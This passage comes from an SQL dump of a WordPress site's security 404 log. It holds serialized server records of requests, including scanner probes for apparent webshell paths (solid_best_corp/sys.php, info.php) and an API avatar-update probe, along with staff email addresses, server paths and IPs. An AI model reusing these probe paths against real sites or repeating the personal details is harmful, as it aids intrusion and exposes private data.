14:52:54',35425880,37234056,'https://bintara.com.my/temp.php',1,0,'193.106.30.99'),(28148,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:32:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:83:\"//index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:9:\"text/html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:63:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:71:\"c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"222.240.240.219\";s:11:\"REMOTE_PORT\";s:5:\"62682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"http://bintara.com.my/index.php\";s:10:\"SCRIPT_URL\";s:10:\"/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xacv4K@51JdM-xtx2nJlOQAAAYQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571237856.3316\";s:12:\"REQUEST_TIME\";s:10:\"1571237856\";}}','notice','2019-10-16 14:57:38','2019-10-16 14:57:36',35331568,37144616,'http://bintara.com.my//index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar',1,0,'222.240.240.219'),(28149,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/blog/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/blog/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xac13dwSqwmg3BSzc7-k3wAAAgU\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/blog/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xac13dwSqwmg3BSzc7-k3wAAAgU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"37302\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:48:\"/blog/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xac13dwSqwmg3BSzc7-k3wAAAgU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571239389.2279\";s:12:\"REQUEST_TIME\";s:10:\"1571239389\";}}','notice','2019-10-16 15:23:12','2019-10-16 15:23:09',35680512,37485528,'https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/sys.php',1,0,'37.187.198.246'),(28150,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/blog/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/blog/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xac19dwSqwmg3BSzc7-k9AAAAhY\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/blog/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xac19dwSqwmg3BSzc7-k9AAAAhY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"44272\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/blog/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xac19dwSqwmg3BSzc7-k9AAAAhY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571239413.5389\";s:12:\"REQUEST_TIME\";s:10:\"1571239413\";}}','notice','2019-10-16 15:23:35','2019-10-16 15:23:33',35055288,36859816,'https://bintara.com.my/blog/wp-content/plugins/solid_best_corp/info.php',1,0,'37.187.198.246'),(28151,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"194.36.99.18\";s:11:\"REMOTE_PORT\";s:5:\"50624\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XadGxq581BjCPGmiPvM6KgAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571243718.1571\";s:12:\"REQUEST_TIME\";s:10:\"1571243718\";}}','notice','2019-10-16 16:35:20','2019-10-16 16:35:18',35033056,36838784,'https://bintara.com.my/?page_id=11',1,0,'194.36.99.18'),(28152,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"352\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{163DB99C-40C3-4C53-9F2E-9A0CD4B1CF77}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{01A30814-299B-44A7-92CF-846FDBDC738F}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:19:\"tech@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:19:\"adif@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xada-@Hzpo8VIVXu4y1G8QAAAAk\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:9:\"1.9.165.2\";s:11:\"REMOTE_PORT\";s:4:\"1069\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xada-@Hzpo8VIVXu4y1G8QAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571248895.9985\";s:12:\"REQUEST_TIME\";s:10:\"1571248895\";}}','notice','2019-10-16 18:01:37','2019-10-16 18:01:36',35352224,37153768,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.9.165.2'),(28153,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"352\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{DDCC99D4-0DFD-4A8C-BC66-136A345CD63D}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{01A30814-299B-44A7-92CF-846FDBDC738F}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:19:\"tech@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:19:\"adif@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xada-xiOQXYMFZHfzxwQZgAAAcQ\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:9:\"1.9.165.2\";s:11:\"REMOTE_PORT\";s:4:\"1070\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xada-xiOQXYMFZHfzxwQZgAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571248895.9597\";s:12:\"REQUEST_TIME\";s:10:\"1571248895\";}}','notice','2019-10-16 18:01:37','2019-10-16 18:01:36',35353352,37154448,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.9.165.2'),(28154,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"352\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{5A0507AA-D3DB-48BD-AD94-BCFEADAB338F}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{01A30814-299B-44A7-92CF-846FDBDC738F}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:19:\"adif@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:19:\"adif@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xada-xiOQXYMFZHfzxwQZQAAAdA\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:9:\"1.9.165.2\";s:11:\"REMOTE_PORT\";s:4:\"1068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xada-xiOQXYMFZHfzxwQZQAAAdA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571248895.9677\";s:12:\"REQUEST_TIME\";s:10:\"1571248895\";}}','notice','2019-10-16 18:01:38','2019-10-16 18:01:36',35745032,37544104,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.9.165.2'),(28155,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/store/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/store/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/store/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaddCaZT-TCAziXz9cl0OwAAAoU\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/store/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/store/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaddCaZT-TCAziXz9cl0OwAAAoU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.152.56\";s:11:\"REMOTE_PORT\";s:5:\"38419\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/store/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:49:\"/store/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaddCaZT-TCAziXz9cl0OwAAAoU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571249417.2073\";s:12:\"REQUEST_TIME\";s:10:\"1571249417\";}}','notice','2019-10-16 18:10:19','2019-10-16 